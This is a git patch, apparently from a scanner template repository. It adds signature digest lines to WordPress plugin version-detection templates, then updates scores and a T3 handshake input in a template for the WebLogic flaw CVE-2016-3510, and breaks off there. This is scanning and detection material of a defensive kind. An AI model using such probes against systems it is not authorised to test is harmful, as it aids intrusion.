100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402210099415e003f43a586ba0c8b15cdddfb6e33f5c69d21e12cabf5afb46bcf58dfdf021f47a149e7b4cb0d726aaac0952a24ebf44e7de68db4cc7f5bde43553efb95b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f7..d7491122be5 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c2050eaff1ca68aed948b13f7ba35dece765fbf73b5bef3123626aeebbd703a0022055dc91a45be14f67dca26de383cc0230b2a9732e9427d991c3120860535142a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf10..f73c3bbdcfc 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f50cb8e8d4426d1f1bef0216eda078fa134be5e7d3fa758a7bd8c10456000fcd022055bf136317d6690273ae097ec4c42042fdcf380cb08c2e6f94e05e8fdc32b379:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7cf..d9ab543c243 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022025f717e32119d7e7ba7b0049a6002114712c09c6e126de24f8132395c553489d02202c97a7bdf654c7e199a566c2623ed6c9cd1bce2f6aaf966570ffe4a6e0dc25ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb44838..debcbed71da 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100941443bc48e1406e1e5042a7362b982b68a7b0bd77a480b6b940672275e5a41a022100ef3053983623b9d0ce542f4cc5a0666eb26b5b5efdbbf6312668ac4d92166dda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdfc..90dfcafb022 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207481659a9d51aab62b4a0be17ddc7bd774adb2911578d4bac953cc604128e2a80220236f7e0277fd1356cc4976720041aa9e6237a139c8610e830bac000d1949f886:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b4..4e5a2ddf17a 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220509ece61bd719623e5178a117ba9ba673b54a74646022785c11c622ce6739498022065a301fcd36c088e61ddc4702428f025f0b399273fb02a4212d2395fcd3075a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbbab..37ac7ce23b3 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a454e0b03eb10755bd22e29208ed116d8a735300a7ee99e799371196844c76ec022100c6c8b748117fd68795601dcd120b94f9436398b4a3b73bd1e6fe676d503b9abe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb9..432cf497ffe 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202d1074368d66e13333f30c1ba0d6ff750222399182e5941a2397e20ad2108057022100fa8289fd8098cd4a3ab00a285b64896807f7f193b47f215aebf20b62b648deb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d1..bcf8f1acaf0 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a46d082b8f64d9e6c1daf68851985908968c68709317b74b550c79125818b350022100d44108819ecd8ebff0cd65b62a147351f1d416b61729fe1c9b5b40fb8ba17a8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d1..a9fa61d5dec 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202792301cf437b68e1f9e3e42d3078411b839e38f72028da926a2300c4cdfaff3022100f98a91a41c65dbd7a951717c7f772128aeb9f21a1e86f9700ecc33ed5f94767e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a90..19b9ae72021 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022045b3abfc49dc7e6e4177b45e80a83de6b25e4e7ae54fca87cc4c1c8733a4628a022075c8566c67c04735922d764ea2b5880612eb6323079e11eef08fcf87b2c9d0ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa297068720..05a1f7f4a7f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100918eb74380ea851fa607347c0704e611306b588c45b94f8dd791c03c9eeb3ab60221008ad2ae7ccc3cb852e403f86cfc9224124f3b9566923d09c5042a36bef88c7db1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7ed..63b43799dba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203a66ad2705fee8ff28984f97c805f84127b648e55786f0a1bc105044a3323a12022100f44deba13567d5aa77a58eaaec75437255b92da4f5e364a250d9965b14ceb240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e78..0b11f3f9c6f 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210080adea2972829e9a8b98b931fe2b043c92fd4a9ac95551129da12cf94cc7880b02202c146fcc9960865b92d7c10a58fee2ab2a3315b9ad2be42283123b9a10f95b99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2a..4a0caea93be 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022001f3a7af554744ecbb728aa8683add141796cc7baaf81e4d0445803d603fbb7f0220741a1a6cd91021271e502b59aaae91093f740753eccc907c5e61394f7897acad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8a..3f5b382c4fd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a2a9fdc3e9a4fc755e2a8bb1801deeb9730cb128c2a4f8c288830fb2024225be02200c352de72f3c17ce0ea9d346ecee5e2dcc398b48c414ed25736cb626db1a1269:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5c..25f3eb170bb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b52375f65d0168a623a095705e8905041e50022854ca18c485af3e011f1f3f9f02207381b38884c75fba27960f99c20e3b0a0a19e87908350ce10df195caa8c7cb05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d97506..3741d17031b 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204df5e7c3ade0768564dc96807c0caabe3b3557e52150d3e7330b261feccb0dd3022075d76268a01e9af7c36ab5d1ba0a5f5f6dc05bc82412cc3076b64cdce21c4850:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab22..05b09efb948 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008278c47430e9fb19da4cba19ce1af7fadb392d5103695e2e86955aceddd34c5b022100db9a3468ed54467696c085b76db57b4484fe39f1b6a90ec2919260c3f670b566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f8..6a7bc32c429 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022068f81cdd45711102fe526e47a6dfd52c34a21c41812136750a9f6e382f1ac14d02207b87c166377ffcae438ff39ba751c893182da1d6ff8e39d482197b43a25f2b4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a8..daa0deb7cfe 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207a43ddad5d4202e795047456e3e917e863beb18f37c0d5a81b2793b6f2eff69802204cc46c27b3e8619729af174fd7f5e1ca8c662c6fcf6f22d3407941b023483fe2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8b..4c42ddaf3e2 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dca6ebd204d5b944b9944eb55ee6dd2e5bc1d05e80cd139f861efd023f8c6b230221009c15c1ae45d0cb09575138ab3a13a810be261ac624887ed147972585616e7d50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486a..ce42f54fac2 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008f5ff4293f07213be285b988fc42d104806675521bd3759e66774b3172cb3a2e0220336be2fdb6d4e50774596f7533150a841f5fab562238579c85dd31ca008fd3e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a69..7744d5fd742 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210094eacee66e33943199bb9c1bace3be9c2edd9fc5a95de77506de93e71b5e01db0220372272b0bb6894ae0e49d53192a2260a2a1a19e1d85aa12e259922a6e66925d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc839..c2623b2659e 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200660ec3aa062936b2c1b508811788d91253353e9cb5fe1aba8ae3f699655f16c022100983336575471b68018d47c010a896c694acf8f403e1483b2c43bf2f81abc32bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb8..28f5246c18d 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022039c27a5ca53fd5b2acdbfea05e01808abcf253e109dd3923b736179beaeaf881022100c866555efb4da04ea855741e52151885512832278f73cfb38cd9f382bb87ff83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53a..830c345d184 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206f71cd60b714e7d5cb2b10a71f8baf7021263d6b206a8df353a247df045486df02206999f64324f55b88b6470a9914bf2fc08bb24f5b25a3723b8d6a0a4f16068d19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f01359..de10975c9d0 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206296c322f05d4b20611fa335342287be5105961ab67624922a64f729b95e6796022018c55cfff7f79b215726895652eeb089f84c9e108a6253b480426fbc698415f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c7..46088b2b9a8 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220663fff582d7df51eb99daec83fc681a6c3538e9732bf7728a0728c01ba39a266022034baf444c8c06203a8649f19162c1d31cc18cef474b7172477ab8af44ac9f988:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd7..233c86374e1 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220222050e77b63e1dfb5163a2cab92a30689a97fa9a96164a796c6a983822ee6cd0221009c309bccdba795e1e7c00a4f1de5449cf69bc6cc350553ebbd395cc651745062:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08d..9fa594eaf1a 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c23fecf4f453bf12a8a41e568954c8061869e105a41934f692855630a8e835d02204414550028f2a6cdb34c72b21e1b94e1dd53524705fcdd21358534aea1d1556e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e99..a4e43f3bb13 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d0a946df352d25792468ccb6ffd0d3954e6c041e1d7f1ee35de9f6736e77233c02202678812d99d161d651cf2538b53260d0b2b8a5f0aec97dce14e483d44637a0c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf55667..f4377b49bf9 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206a3ded7f3bb2ee85ec16d58336c63df17a309f62f96ff7fb4b1ea7fe24146290022100d432c0aced398e05ffc28595a431163572923a1db0bfb75fbcf8305836f6cc72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac74..46cf3d27322 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202ea181451fbfc676276f8f2e9cd78753b0b6501c9d66c93ba5142e7c8629191002205999b68b6523502578b1ce764d8262e7d957a6f5c5bc82a3f84fc9a8b94ccfcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df49..8b9a9ae855a 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210084caac3481937fd095d12f724c70b3986823f65640bd141cb46e42132e75cabd022000efa5cbb1d8ec9c954e3066186b7b8329c07d17b562361a5bc0854b9d3b70d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee0467..89e4e5fd0f8 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c253a322c8a9e9bf4302c53c3c1f495f45601ca88d61fcf9a3887c95e4385732022100de66ecc3c05e97b4a92ddaa9c7e9db31bd9084f7eb51d1dd28af3f4ee4a3443e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0d..547228c8129 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a5724a9ca75b3598d20ed25529f50219e6b94ae0a79f3ac4af71c84057a4a809022100af318bb9b5d2416ed6080cde6fa816605ac85291d779fbcd982e3d6f5e56174d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff55..fad5e698c70 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f051ab07e4865c491254a7bd0952e2043349a475d11abd66796cbd7ad51aeccb022100999d4f0ca5667ac690ca8f2d355ae36b58afe86207279a563993e6a51449d049:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e3..11ec8409d66 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220232efc822075000829e67bbeaafe97c635decc85a688617ddc3b1b39c5a186af022100da53a350503bd6871d3f489606dce5e449462af8aa29b6ac7c5c10c0ec764fa1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed6..d4cf683762c 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fbecd2ca3ac67601649c03436eb0b014b086df216040efa6c30547bdacd1bc220220129fa29939b9944a39f13ddabb47d90cb6ec67473ba00fbe118680869f332cf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a172..d5994059b17 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220032080307ac68f111523f63082104f86842e7caaec5eb275b77c555fb52abb1002207a01e2e7e62166fa07640dc01e1dfcea08d8136a597acdf558a5a46c715b4543:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afebd..609bcdb3434 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e1e1641d187f75c4a8ed4a7cfc93df0bfbe8841e565c626942a778cdf584736a022100d8a53705b4d95e67e7518134608d06e79faf080115ba497e440633c4dbc3d2d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b49..abce15aeff1 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220483da9e245d50c362da31579c67f881938a75845b640288a9b7dc400a2aaf31f02202ed3b6c4d36b3d212afa630acfed612eecac1d257a96137a30abf92e89c870a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda1174..c238ec3240a 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009e4c9694e62ccc9e91193c6a76f6cd27910651aca26c0c72d92c052572ef937f02207c034e1848bc26226737317bedc7184349f26eca74c230c991cfc406c8230a29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From de032d1dd6b7b4034887479500c20c3a2d2dfb4e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Jul 2024 13:14:49 +0530 Subject: [PATCH 048/247] misc update --- network/cves/2016/CVE-2016-3510.yaml | 18 +++++------------- 1 file changed, 5 insertions(+), 13 deletions(-) diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index 72472c03512..9cdd02fbccf 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2016-3510 cwe-id: CWE-119 - epss-score: 0.04407 - epss-percentile: 0.92379 + epss-score: 0.03351 + epss-percentile: 0.91456 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: verified: true @@ -39,23 +39,15 @@ variables: tcp: - inputs: - - data: "t3 12.2.1 - - AS:255 - - HL:19 - - MS:10000000 - - PU:t3://us-l-breens:7001 - - \n" + 